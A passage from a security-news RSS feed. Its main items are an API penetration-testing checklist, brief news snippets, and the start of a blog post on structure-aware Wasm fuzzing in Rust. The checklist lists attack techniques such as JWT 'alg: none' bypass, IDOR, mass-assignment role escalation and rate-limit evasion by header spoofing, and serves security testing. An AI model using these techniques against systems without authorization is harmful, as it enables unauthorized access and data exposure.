href="https://t.me/Securi3yTalent">Securi3yTalent</a></p><p>#CyberSecurity #BugBounty #BugBountyHunter #EthicalHacking #InfoSec #WebSecurity #ApplicationSecurity #AppSec #CloudSecurity #FrontendSecurity #WebDevelopment #JavaScript #ReactJS #Laravel #NodeJS #DevSecOps #OWASP #SecretsManagement #GitHub #GitHubDorks #SourceMaps #EnvFiles #SecurityResearch #PenetrationTesting #RedTeam #BlueTeam #CloudComputing #AWS #Azure #GoogleCloud #VibeCoding #AI #SecureCoding #DeveloperSecurity #TechBlog #Programming</p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=60c4fd28ab4b" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/frontend-security-bug-hunting-the-env-file-crisis-and-real-world-exploitation-60c4fd28ab4b">Frontend Security &amp; Bug Hunting: The .env File Crisis and Real-World Exploitation</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[API Penetration Testing Checklist: How Real-World Attacks Break APIs Before Scanners Do]]></title>
<description><![CDATA[How Real-World Attacks Break APIs Before Scanners DoAPIs are the backbone of modern applications: powering mobile banking, e-commerce, healthcare systems, AI integrations, and microservices.Today, APIs handle over 90% of global web traffic, yet they remain one of the most exploited attack surface...]]></description>
<link>https://tsecurity.de/de/3571864/hacking/api-penetration-testing-checklist-how-real-world-attacks-break-apis-before-scanners-do/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3571864/hacking/api-penetration-testing-checklist-how-real-world-attacks-break-apis-before-scanners-do/</guid>
<pubDate>Thu, 04 Jun 2026 10:21:38 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*fSb1qbXl1rzvMvuv2vkzig.png"></figure><h4>How Real-World Attacks Break APIs Before Scanners Do</h4><p>APIs are the backbone of modern applications: powering mobile banking, e-commerce, healthcare systems, AI integrations, and microservices.</p><p>Today, APIs handle <strong>over 90% of global web traffic</strong>, yet they remain one of the most exploited attack surfaces in modern security incidents.</p><p>High-profile breaches like <strong>T-Mobile (37M records exposed)</strong> and <strong>Optus (9.8M records leaked)</strong> were not caused by advanced exploits: but by simple <strong>broken authorization and exposed API logic</strong>.</p><p>And in both cases, automated scanners failed.Because API security failures are rarely technical bugs.They are <strong>logic flaws in how systems define trust, identity, and access</strong>.</p><h3>Why APIs Break in Real World</h3><p>APIs fail because:</p><ul><li>Business logic is exposed directly through endpoints</li><li>Authorization is weaker than authentication</li><li>APIs evolve faster than security testing</li><li>Attackers test workflows, not just inputs</li></ul><blockquote><em>Scanners detect vulnerabilities. Attackers exploit behavior.</em></blockquote><h3>Black Box vs Grey Box Testing</h3><h3>Black Box</h3><p>No internal access-only:</p><ul><li>Base URL or application</li><li>Swagger (sometimes)</li><li>Mobile app (sometimes)</li></ul><p>Focus:</p><ul><li>Endpoint discovery (fuzzing)</li><li>Traffic interception (Burp/ZAP)</li><li>Shadow API detection</li></ul><p>Common findings:</p><ul><li>/admin</li><li>/internal</li><li>/debug</li><li>/v2, /beta</li></ul><h3>Grey Box</h3><p>Partial access:</p><ul><li>Postman collections</li><li>API documentation</li><li>Architecture insights</li></ul><p>Enables deeper testing of:</p><ul><li>Authorization logic</li><li>Token flows</li><li>Business workflows</li></ul><h3>API Recon (Attack Surface Mapping)</h3><h4>1. Endpoint Fuzzing</h4><p>Test:</p><ul><li>/api/v1/users</li><li>/api/v2/users</li><li>/internal/users</li></ul><h4>2. HTTP Method Testing</h4><p>Check:</p><ul><li>GET, POST, PUT, DELETE, PATCH, OPTIONS</li></ul><h4>3. Shadow APIs</h4><p>Hidden or forgotten APIs in:</p><ul><li>legacy systems</li><li>mobile backends</li><li>internal services exposed externally</li></ul><h4>4. Version Enumeration</h4><p>Test:</p><ul><li>/v1/</li><li>/v2/</li><li>/beta/</li></ul><p>Older versions often lack proper security controls.</p><h3>Authentication &amp; Identity Testing</h3><h4>Common Failures</h4><ul><li>Weak login protection (no lockout / CAPTCHA)</li><li>User enumeration via error messages</li><li>Expired tokens still valid</li><li>API keys exposed or reused</li><li>Sensitive data in URLs</li></ul><p>Example:</p><pre>GET /reset?token=abc123</pre><h4>JWT Security Testing</h4><h4>Key Checks</h4><ul><li>alg: none bypass</li><li>Weak HS256 secrets (brute force)</li><li>Missing token expiration validation</li><li>Sensitive data in JWT payload</li></ul><p><strong>JWT is base64 encoded, not encrypted.</strong></p><h3>Authorization Testing (Critical Layer)</h3><h4>1. BOLA / IDOR</h4><p>Change object references:</p><pre>/user/123 → /user/456</pre><p>If accessible → data exposure.</p><h4>2. BFLA (Function-Level Access)</h4><p>Test admin actions as normal user:</p><ul><li>delete</li><li>update</li><li>privileged endpoints</li></ul><h4>3. Privilege Escalation</h4><p>Check for:</p><ul><li>role manipulation in request body</li><li>mass assignment flaws</li><li>hidden admin parameters</li></ul><p>Example:</p><pre>{"role": "admin"}</pre><h4>Input Validation &amp; Injection</h4><p>Test for:</p><ul><li>SQL / NoSQL injection</li><li>command injection</li><li>malformed JSON payloads</li><li>unexpected data types</li></ul><p>APIs often trust frontend validation -which is unsafe.</p><h3>Business Logic Vulnerabilities (High Impact)</h3><h4>1. Pricing Manipulation</h4><ul><li>negative values</li><li>discount abuse</li><li>price tampering</li></ul><h4>2. Workflow Abuse</h4><ul><li>skipping payment steps</li><li>replaying requests</li><li>out-of-order operations</li></ul><h4>3. Inventory Manipulation</h4><ul><li>race conditions</li><li>cart abuse</li><li>stock exhaustion</li></ul><h4>4. Account Abuse</h4><ul><li>role escalation via hidden fields</li><li>mass assignment issues</li></ul><h4>Rate Limiting &amp; Abuse</h4><p>Test for:</p><ul><li>brute force attacks</li><li>OTP guessing</li><li>API scraping</li><li>unlimited requests</li></ul><h4>Bypass Techniques</h4><ul><li>IP rotation</li><li>header spoofing (X-Forwarded-For)</li><li>parallel requests</li></ul><h4>Data Exposure Issues</h4><p>Check for:</p><ul><li>PII leaks (email, phone, address)</li><li>internal IDs exposed</li><li>password hashes in responses</li><li>excessive response data</li></ul><p>If response is “too detailed”, it’s a risk.</p><h4>Configuration &amp; Misconfigurations</h4><p>Common issues:</p><ul><li>exposed /debug, /internal</li><li>CORS set to *</li><li>missing security headers</li><li>outdated API versions</li><li>secrets in logs or configs</li></ul><h3>Modern API Attack Surface</h3><h4>GraphQL</h4><ul><li>introspection enabled</li><li>query depth abuse</li><li>batch requests for brute force</li></ul><h4>Cloud APIs</h4><ul><li>public S3 / blob storage</li><li>misconfigured IAM permissions</li><li>exposed storage endpoints</li></ul><h4>File Upload APIs</h4><ul><li>unrestricted file types</li><li>executable uploads</li><li>bypass validation</li></ul><h4>SSRF in APIs</h4><ul><li>user-controlled URLs</li><li>internal network access via API calls</li></ul><h3>Automation vs Manual Testing</h3><h4>Automate:</h4><ul><li>baseline security checks</li><li>authentication testing</li><li>regression scans</li><li>CI/CD integration</li></ul><h4>Keep Manual for:</h4><ul><li>business logic flaws</li><li>authorization bypass</li><li>complex workflows</li></ul><p>Best approach = hybrid security testing</p><h4>Final API Security Checklist (Summary)</h4><p>Every API must be tested for:</p><ul><li>Authentication &amp; Authorization (BOLA, BFLA)</li><li>Input validation &amp; injection</li><li>Business logic abuse</li><li>Rate limiting</li><li>Data exposure</li><li>Configuration issues</li><li>Cloud &amp; GraphQL security</li></ul><h3>Final Thought</h3><p>API security is not about endpoints.It is about <strong>how trust is defined: and how it is broken</strong>. Most vulnerabilities are not coding errors. They are <strong>unvalidated assumptions in business logic</strong>. And attackers don’t break APIs. They simply <strong>use them in ways nobody tested</strong>.</p><p>This concludes my API security series. Next, I’ll be exploring Active Directory penetration testing.</p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=1edbea3bcd2a" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/api-penetration-testing-checklist-how-real-world-attacks-break-apis-before-scanners-do-1edbea3bcd2a">API Penetration Testing Checklist: How Real-World Attacks Break APIs Before Scanners Do</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Elon Musk and America’s Far Right Stoke Anger Over Murder of UK Teen]]></title>
<description><![CDATA[Influential figures, including Nick Fuentes, have been accused of “hijacking” the murder of Henry Nowak to push a racist agenda.]]></description>
<link>https://tsecurity.de/de/3570542/it-nachrichten/elon-musk-and-americas-far-right-stoke-anger-over-murder-of-uk-teen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3570542/it-nachrichten/elon-musk-and-americas-far-right-stoke-anger-over-murder-of-uk-teen/</guid>
<pubDate>Wed, 03 Jun 2026 20:31:59 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Influential figures, including Nick Fuentes, have been accused of “hijacking” the murder of Henry Nowak to push a racist agenda.]]></content:encoded>
</item>
<item>
<title><![CDATA[Northern Ireland cops issue PSA after official phone number spoofed by scammers]]></title>
<description><![CDATA[If you’re going to impersonate an officer, perhaps choose a more sophisticated way to nick cash than asking for gift cards… This article has been indexed from www.theregister.com – Articles Read the original article: Northern Ireland cops issue PSA after…
Read more →
The post Northern Ireland cop...]]></description>
<link>https://tsecurity.de/de/3565794/it-security-nachrichten/northern-ireland-cops-issue-psa-after-official-phone-number-spoofed-by-scammers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3565794/it-security-nachrichten/northern-ireland-cops-issue-psa-after-official-phone-number-spoofed-by-scammers/</guid>
<pubDate>Tue, 02 Jun 2026 13:07:49 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>If you’re going to impersonate an officer, perhaps choose a more sophisticated way to nick cash than asking for gift cards… This article has been indexed from www.theregister.com – Articles Read the original article: Northern Ireland cops issue PSA after…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/northern-ireland-cops-issue-psa-after-official-phone-number-spoofed-by-scammers/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/northern-ireland-cops-issue-psa-after-official-phone-number-spoofed-by-scammers/">Northern Ireland cops issue PSA after official phone number spoofed by scammers</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Northern Ireland cops issue PSA after official phone number spoofed by scammers]]></title>
<description><![CDATA[If you’re going to impersonate an officer, perhaps choose a more sophisticated way to nick cash than asking for gift cards…]]></description>
<link>https://tsecurity.de/de/3565761/it-security-nachrichten/northern-ireland-cops-issue-psa-after-official-phone-number-spoofed-by-scammers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3565761/it-security-nachrichten/northern-ireland-cops-issue-psa-after-official-phone-number-spoofed-by-scammers/</guid>
<pubDate>Tue, 02 Jun 2026 12:53:17 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[If you’re going to impersonate an officer, perhaps choose a more sophisticated way to nick cash than asking for gift cards…]]></content:encoded>
</item>
<item>
<title><![CDATA[Nick Fitzgerald: A Structure-Aware Fuzzing Experiment]]></title>
<description><![CDATA[Structure-aware fuzzing can better exercise the system under test (SUT) by
crafting inputs in the format expected by the SUT, rather than throwing
pseudorandom bytes against it. That is, it avoids “shallow” inputs that the SUT
will reject early (for example, syntactically invalid source text when...]]></description>
<link>https://tsecurity.de/de/3563869/tools/nick-fitzgerald-a-structure-aware-fuzzing-experiment/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3563869/tools/nick-fitzgerald-a-structure-aware-fuzzing-experiment/</guid>
<pubDate>Mon, 01 Jun 2026 19:24:02 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Structure-aware fuzzing can better exercise the system under test (SUT) by
crafting inputs in the format expected by the SUT, rather than throwing
pseudorandom bytes against it. That is, it avoids “shallow” inputs that the SUT
will reject early (for example, syntactically invalid source text when fuzzing a
programming language’s compiler) and only produces inputs that go “deep” into
the SUT (e.g. programs that type-check and exercise the mid-end optimizer and
backend code generator). The Rust fuzzing ecosystem is largely built around
<a href="https://github.com/rust-fuzz/cargo-fuzz"><code class="language-plaintext highlighter-rouge">cargo-fuzz</code></a> and the <a href="https://github.com/rust-fuzz/libfuzzer"><code class="language-plaintext highlighter-rouge">libfuzzer-sys</code></a> crate, which provides two methods for
structure-aware fuzzing:</p>

<ol>
  <li>
    <p><em>Generating</em> structured inputs from scratch with the <a href="https://github.com/rust-fuzz/arbitrary"><code class="language-plaintext highlighter-rouge">arbitrary</code></a> crate</p>
  </li>
  <li>
    <p><em>Mutating</em> existing inputs from the fuzzer’s corpus in a structure-aware
manner, thereby producing new structured inputs, via the
<a href="https://docs.rs/libfuzzer-sys/0.4.12/libfuzzer_sys/macro.fuzz_mutator.html"><code class="language-plaintext highlighter-rouge">fuzz_mutator!</code></a> hook</p>
  </li>
</ol>

<p>While the two methods are not technically mutually exclusive, combining the two
can be difficult and engineering resources are finite. So:</p>

<blockquote>
  <p><strong><em>If we are only implementing one approach, is generation or mutation better?</em></strong></p>
</blockquote>

<p>To help answer this question, I implemented structure-aware generation and
mutation of guaranteed-valid <a href="https://webassembly.org/">WebAssembly</a> (Wasm) instruction sequences. This
task is small enough to be easily understandable but large enough and real
enough to (hopefully) be representative and applicable to other domains, or, at
the very least, interesting.<sup><a class="footnote" href="https://fitzgeraldnick.com/weblog/feeds/latest-atom/#fn:applicable" rel="footnote">1</a></sup> To evaluate their effectiveness, I
used <a href="https://wasmtime.dev/">Wasmtime</a> as the SUT, <code class="language-plaintext highlighter-rouge">libfuzzer-sys</code> as the fuzzing engine driving
everything, and then compared code coverage over time when using mutation-based
fuzzing versus generation-based fuzzing.</p>

<p>Additionally, there are many ways we can generate pseudorandom WebAssembly
instruction sequences. In this experiment, I’ve evaluated three methods:</p>

<ol>
  <li>
    <p>Unconstrained instruction sequence generation followed by a fixup pass to
ensure validity</p>
  </li>
  <li>
    <p>Generating valid instructions in a forwards, bottom-up
manner (from operands to operators)</p>
  </li>
  <li>
    <p>Generating valid instructions in a backwards, top-down manner (from operators
to operands)</p>
  </li>
</ol>

<p>In contrast, while there are surely many ways to mutate a given WebAssembly
instruction sequence into a new, valid instruction sequence, I’ve only
implemented one method: perform an arbitrary instruction insertion, deletion, or
replacement, producing a new but probably-invalid instruction sequence, and then
run the same fixup pass mentioned previously to ensure validity. This is the
direct mutation-based equivalent of the first generation-based method.</p>

<p><em>Before continuing further, I want to disclose that I am the author of
<code class="language-plaintext highlighter-rouge">wasm-smith</code> and <code class="language-plaintext highlighter-rouge">mutatis</code>, and a maintainer of Wasmtime, <code class="language-plaintext highlighter-rouge">arbitrary</code>,
<code class="language-plaintext highlighter-rouge">libfuzzer-sys</code>, and <code class="language-plaintext highlighter-rouge">cargo-fuzz</code>. That is, while I am familiar with Wasm,
fuzzing, fuzzing Wasm, and both the <code class="language-plaintext highlighter-rouge">arbitrary</code> and <code class="language-plaintext highlighter-rouge">mutatis</code> crates, I may also
be propagating my own biases into these implementations.</em></p>

<h3>Background</h3>

<h4>Generation-Based and Mutation-Based Fuzzing</h4>

<p>A generation-based fuzzer uses a <em>generator</em> to create a pseudo-random test
cases from scratch, feeds these into the system under test, and reports any
failures to the user:</p>

<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">fn</span> <span class="n">generation_based_fuzzing</span><span class="o">&lt;</span><span class="n">T</span><span class="o">&gt;</span><span class="p">(</span>
    <span class="c1">// A test-case generator.</span>
    <span class="n">generator</span><span class="p">:</span> <span class="k">impl</span> <span class="nf">Fn</span><span class="p">()</span> <span class="k">-&gt;</span> <span class="n">T</span><span class="p">,</span>
    <span class="c1">// A function to run the system under test with a</span>
    <span class="c1">// generated test case, returning a result that</span>
    <span class="c1">// describes whether the run was successful or</span>
    <span class="c1">// not.</span>
    <span class="n">run_system_under_test</span><span class="p">:</span> <span class="k">impl</span> <span class="nf">Fn</span><span class="p">(</span><span class="o">&amp;</span><span class="n">T</span><span class="p">)</span> <span class="k">-&gt;</span> <span class="n">FuzzResult</span><span class="p">,</span>
<span class="p">)</span> <span class="p">{</span>
    <span class="k">loop</span> <span class="p">{</span>
        <span class="c1">// Generate an input.</span>
        <span class="k">let</span> <span class="n">input</span> <span class="o">=</span> <span class="nf">generator</span><span class="p">();</span>

        <span class="c1">// Run the input through the system under test.</span>
        <span class="k">let</span> <span class="n">result</span> <span class="o">=</span> <span class="nf">run_system_under_test</span><span class="p">(</span><span class="o">&amp;</span><span class="n">input</span><span class="p">);</span>

        <span class="c1">// If the system crashed, panicked, failed an</span>
        <span class="c1">// assertion, violated an invariant, or etc...</span>
        <span class="c1">// then report that to the user.</span>
        <span class="k">if</span> <span class="k">let</span> <span class="nf">Err</span><span class="p">(</span><span class="n">failure</span><span class="p">)</span> <span class="o">=</span> <span class="n">result</span> <span class="p">{</span>
            <span class="nf">report_to_user</span><span class="p">(</span><span class="o">&amp;</span><span class="n">input</span><span class="p">,</span> <span class="n">failure</span><span class="p">);</span>
        <span class="p">}</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>On the other hand, mutation-based fuzzers are given an initial corpus of inputs
and create new inputs by mutating existing corpus members. They run each new
input through the SUT, report failures the same as before, and if the new input
was “interesting” (for example, exercised new code paths in the SUT that weren’t
previously covered in any other input’s execution) then the new input is added
into the corpus for use in future test iterations:</p>

<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">fn</span> <span class="n">mutation_based_fuzzing</span><span class="o">&lt;</span><span class="n">T</span><span class="o">&gt;</span><span class="p">(</span>
    <span class="c1">// A corpus of test cases.</span>
    <span class="n">corpus</span><span class="p">:</span> <span class="o">&amp;</span><span class="k">mut</span> <span class="n">Corpus</span><span class="o">&lt;</span><span class="n">T</span><span class="o">&gt;</span><span class="p">,</span>
    <span class="c1">// A function to pseudo-randomly mutate an existing</span>
    <span class="c1">// input into a new input.</span>
    <span class="n">mutate</span><span class="p">:</span> <span class="k">impl</span> <span class="nf">Fn</span><span class="p">(</span><span class="o">&amp;</span><span class="n">T</span><span class="p">)</span> <span class="k">-&gt;</span> <span class="n">T</span><span class="p">,</span>
    <span class="c1">// A function to run an input in the system under</span>
    <span class="c1">// test, returning a result that describes whether</span>
    <span class="c1">// the run was successful or not.</span>
    <span class="n">run_system_under_test</span><span class="p">:</span> <span class="k">impl</span> <span class="nf">Fn</span><span class="p">(</span><span class="o">&amp;</span><span class="n">T</span><span class="p">)</span> <span class="k">-&gt;</span> <span class="n">FuzzResult</span><span class="p">,</span>
<span class="p">)</span> <span class="p">{</span>
    <span class="k">loop</span> <span class="p">{</span>
        <span class="c1">// Choose an old test case from the corpus.</span>
        <span class="k">let</span> <span class="n">old_input</span> <span class="o">=</span> <span class="n">corpus</span><span class="nf">.choose_one</span><span class="p">();</span>

        <span class="c1">// Pseudo-randomly mutate that old test case,</span>
        <span class="c1">// creating a new one.</span>
        <span class="k">let</span> <span class="n">input</span> <span class="o">=</span> <span class="nf">mutate</span><span class="p">(</span><span class="n">old_input</span><span class="p">);</span>

        <span class="c1">// Run the input through the system under test.</span>
        <span class="k">let</span> <span class="n">result</span> <span class="o">=</span> <span class="nf">run_system_under_test</span><span class="p">(</span><span class="o">&amp;</span><span class="n">input</span><span class="p">);</span>

        <span class="c1">// If the system crashed, panicked, failed an</span>
        <span class="c1">// assertion, violated an invariant, or etc...</span>
        <span class="c1">// then report that to the user.</span>
        <span class="k">if</span> <span class="k">let</span> <span class="nf">Err</span><span class="p">(</span><span class="n">failure</span><span class="p">)</span> <span class="o">=</span> <span class="n">result</span> <span class="p">{</span>
            <span class="nf">report_to_user</span><span class="p">(</span><span class="o">&amp;</span><span class="n">input</span><span class="p">,</span> <span class="n">failure</span><span class="p">);</span>
        <span class="p">}</span>

        <span class="c1">// If the input was interesting, for example if</span>
        <span class="c1">// it executed previously-unknown code paths,</span>
        <span class="c1">// then add it into the corpus for use in a</span>
        <span class="c1">// future iteration.</span>
        <span class="k">if</span> <span class="n">result</span><span class="nf">.input_was_interesting</span><span class="p">()</span> <span class="p">{</span>
            <span class="n">corpus</span><span class="nf">.insert</span><span class="p">(</span><span class="n">input</span><span class="p">);</span>
        <span class="p">}</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The two approaches are not mutually exclusive and hybrid generation- and
mutation-based fuzzers exist.</p>

<p>More resources:</p>

<ul>
  <li><a href="https://en.wikipedia.org/wiki/Fuzzing#Reuse_of_existing_input_seeds">Wikipedia’s “Fuzzing” article’s “Reuse of existing input seeds”
section</a></li>
  <li><a href="https://www.fuzzingbook.org/html/MutationFuzzer.html">The Fuzzing Book’s Mutation-Based Fuzzing
chapter</a></li>
  <li><a href="https://fitzgen.com/2020/08/24/writing-a-test-case-generator.html">Writing a Test Case Generator for a Programming
Language</a></li>
</ul>

<h4>Structure-Aware Fuzzing</h4>

<p>Structure-<em>unaware</em> fuzzing will generate pseudorandom byte sequences and pass
them directly to the SUT. If the SUT expects some sort of structured input,
e.g. the source text for a programming language, it is likely that these byte
sequences are invalid and will be rejected early by the SUT’s frontend. For
example, when fuzzing a compiler, the input is rejected as syntactically invalid
by the parser or rejected as semantically invalid by the type checker. This can
be useful when hardening a tokenizer, parser, or type checker, but is less
useful when hunting for misoptimization in the mid-end or bad instruction
encoding in the backend because the inputs are unlikely to make it that far
through the compiler’s pipeline.</p>

<p>Structure-<em>aware</em> fuzzing will produce inputs that match the SUT’s expected
input format. Returning to the compiler-fuzzing example, structure-aware fuzzing
lets us generate valid programs for the compiler, so we can exercise more of the
mid-end and backend, rather than just the frontend.</p>

<p>Structure-aware fuzzing is often generation-based: for example using
<a href="https://www.fuzzingbook.org/html/Grammars.html">grammar-based fuzzing</a> to generate pseudorandom strings from a given language
grammar or language-specific tools like <a href="https://github.com/csmith-project/csmith"><code class="language-plaintext highlighter-rouge">csmith</code></a> and <a href="https://docs.rs/wasm-smith"><code class="language-plaintext highlighter-rouge">wasm-smith</code></a> that
generate C and WebAssembly programs respectively. But structure-aware fuzzing
can also be mutation-based: <a href="https://github.com/llvm/llvm-project/blob/192601e8b3ad8b5f73cf27f2093fef5a8c9f4cb6/compiler-rt/test/fuzzer/CompressedTest.cpp#L33-L59"><code class="language-plaintext highlighter-rouge">libFuzzer</code>’s custom mutator
example</a>
implements a structure-aware mutator for zlib-compressed strings, where the raw
input is decompressed, the decompressed data is mutated, and then the mutated
data is recompressed to provide the new raw input. The mutator is aware of the
SUT’s zlib-compressed input structure.</p>

<p>More resources:</p>

<ul>
  <li><a href="https://en.wikipedia.org/wiki/Fuzzing#Aware_of_input_structure">Wikipedia’s “Fuzzing” article’s “Aware of input structure”
section</a></li>
  <li><a href="https://github.com/google/fuzzing/blob/master/docs/structure-aware-fuzzing.md"><code class="language-plaintext highlighter-rouge">google/fuzzing</code> on structure-aware
fuzzing</a></li>
  <li><a href="https://rust-fuzz.github.io/book/cargo-fuzz/structure-aware-fuzzing.html">The <code class="language-plaintext highlighter-rouge">rust-fuzz</code> book on structure-aware
fuzzing</a></li>
</ul>

<h4>The <code class="language-plaintext highlighter-rouge">arbitrary</code> Crate</h4>

<p>The <a href="https://github.com/rust-fuzz/arbitrary"><code class="language-plaintext highlighter-rouge">arbitrary</code></a> crate helps Rust developers write custom structure-aware
generators for fuzzing. It provides building blocks and abstractions for
translating a raw byte sequence (usually from a fuzzing engine) into a
structured type, effectively interpreting the raw bytes as a “DNA string” or set
of predetermined choices for its decision tree. The library also provides a
<code class="language-plaintext highlighter-rouge">derive(Arbitrary)</code> macro to automatically implement its functionality for a
given type.</p>

<p>Because <code class="language-plaintext highlighter-rouge">arbitrary</code> is effectively implemented by combining decision trees, it
is extremely easy to create imbalanced trees and unintentionally <a href="https://blog.regehr.org/archives/1700">bias the
distribution of generated test cases</a>.</p>

<h4>The <code class="language-plaintext highlighter-rouge">mutatis</code> Crate</h4>

<p>The <a href="https://docs.rs/mutatis"><code class="language-plaintext highlighter-rouge">mutatis</code></a> crate is, at a high-level, performing the same role for
authoring structure-aware mutators that <code class="language-plaintext highlighter-rouge">arbitrary</code> plays for generators. That
is, it provides Rust developers with abstractions and combinators for creating
custom structure-aware mutators. It also provides a <code class="language-plaintext highlighter-rouge">derive(Mutate)</code> macro to
automatically implement its functionality for a given type.</p>

<p><code class="language-plaintext highlighter-rouge">mutatis</code> is designed to resist bias via a two-phase design: first, it
enumerates all of the candidate mutations that could be applied to a test case,
and only afterwards chooses a particular random mutation from the candidate set
to actually apply.</p>

<h4>WebAssembly</h4>

<p><a href="https://webassembly.org/">WebAssembly</a> is a virtual instruction set designed to be safe, portable, and
fast. It is a stack machine where an instruction’s operands are popped off a
stack during execution and results pushed. It has sandboxed linear memories,
global variables, and local variables (the latter two effectively being two
kinds of virtual registers). The following instruction sequence computes <code class="language-plaintext highlighter-rouge">a * 3</code>
and stores the result into memory at address <code class="language-plaintext highlighter-rouge">p</code>:</p>

<div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">;; []</span>
<span class="nf">local.get</span> <span class="kc">$</span><span class="nv">p</span>
<span class="c1">;; [p]</span>
<span class="nf">local.get</span> <span class="kc">$</span><span class="nv">a</span>
<span class="c1">;; [p, a]</span>
<span class="nf">i32.const</span> <span class="mi">3</span>
<span class="c1">;; [p, a, 3]</span>
<span class="nf">i32.mul</span>
<span class="c1">;; [p, a*3]</span>
<span class="nf">i32.store</span>
<span class="c1">;; []</span>
</code></pre></div></div>

<h3>Generator and Mutator Implementation</h3>

<p>The range of all three generators and the mutator is the same universe of
WebAssembly programs. They are all implemented on top of the same <code class="language-plaintext highlighter-rouge">Module</code> and
<code class="language-plaintext highlighter-rouge">Inst</code> types, and, given enough time, none is capable of producing an
instruction sequence that another cannot. This helps ensure that our comparison
is apples-to-apples. However, due to their different implementation techniques,
they do produce different distributions of WebAssembly programs within that
universe, and produce test cases at different speeds from one another, which
ultimately affects how efficiently they exercise the SUT.</p>

<p>All of the generators are built on top of the <a href="https://github.com/rust-fuzz/arbitrary"><code class="language-plaintext highlighter-rouge">arbitrary</code></a> crate. The mutator
is built on top of the <a href="https://docs.rs/mutatis"><code class="language-plaintext highlighter-rouge">mutatis</code></a> crate.</p>

<p>The <code class="language-plaintext highlighter-rouge">Module</code> type is our structured fuzzing input. It describes a WebAssembly
module containing a variable number of linear memories, a variable number and
type of globals, and one function with a variable number and type of parameters
and results and a variable instruction sequence:</p>

<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cd">/// A WebAssembly module of the shape:</span>
<span class="cd">///</span>
<span class="cd">///     (module</span>
<span class="cd">///       (memory ...)</span>
<span class="cd">///       (memory ...)</span>
<span class="cd">///       ...</span>
<span class="cd">///</span>
<span class="cd">///       (global ...)</span>
<span class="cd">///       (global ...)</span>
<span class="cd">///       ...</span>
<span class="cd">///</span>
<span class="cd">///       (func (export "run") (param ...) (result ...)</span>
<span class="cd">///         ...</span>
<span class="cd">///       )</span>
<span class="cd">///     )</span>
<span class="k">pub</span> <span class="k">struct</span> <span class="n">Module</span> <span class="p">{</span>
    <span class="n">num_memories</span><span class="p">:</span> <span class="nb">u32</span><span class="p">,</span>
    <span class="n">globals</span><span class="p">:</span> <span class="nb">Vec</span><span class="o">&lt;</span><span class="n">Global</span><span class="o">&gt;</span><span class="p">,</span>
    <span class="n">param_types</span><span class="p">:</span> <span class="nb">Vec</span><span class="o">&lt;</span><span class="n">ValType</span><span class="o">&gt;</span><span class="p">,</span>
    <span class="n">result_types</span><span class="p">:</span> <span class="nb">Vec</span><span class="o">&lt;</span><span class="n">ValType</span><span class="o">&gt;</span><span class="p">,</span>
    <span class="n">instructions</span><span class="p">:</span> <span class="nb">Vec</span><span class="o">&lt;</span><span class="n">Inst</span><span class="o">&gt;</span><span class="p">,</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">Inst</code> type is an <code class="language-plaintext highlighter-rouge">enum</code> of all the WebAssembly instructions the
implementations support, which is all of the integer, float, SIMD, memory,
local, and global instructions. Control-flow, threading, table, and GC
instructions are not supported. Here is a subset of <code class="language-plaintext highlighter-rouge">Inst</code>’s definition:</p>

<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cd">/// A WebAssembly instruction.</span>
<span class="k">pub</span> <span class="k">enum</span> <span class="n">Inst</span> <span class="p">{</span>
    <span class="nb">Drop</span><span class="p">,</span>
    <span class="nf">LocalGet</span><span class="p">(</span><span class="nb">u32</span><span class="p">),</span>
    <span class="nf">GlobalGet</span><span class="p">(</span><span class="nb">u32</span><span class="p">),</span>

    <span class="c1">// ...</span>

    <span class="nf">I32Const</span><span class="p">(</span><span class="nb">i32</span><span class="p">),</span>
    <span class="n">I32Add</span><span class="p">,</span>
    <span class="n">I32Sub</span><span class="p">,</span>
    <span class="n">I32Mul</span><span class="p">,</span>

    <span class="c1">// ...</span>

    <span class="nf">I64Const</span><span class="p">(</span><span class="nb">i64</span><span class="p">),</span>
    <span class="n">I64Add</span><span class="p">,</span>
    <span class="n">I64Sub</span><span class="p">,</span>
    <span class="n">I64Mul</span><span class="p">,</span>

    <span class="c1">// ...</span>

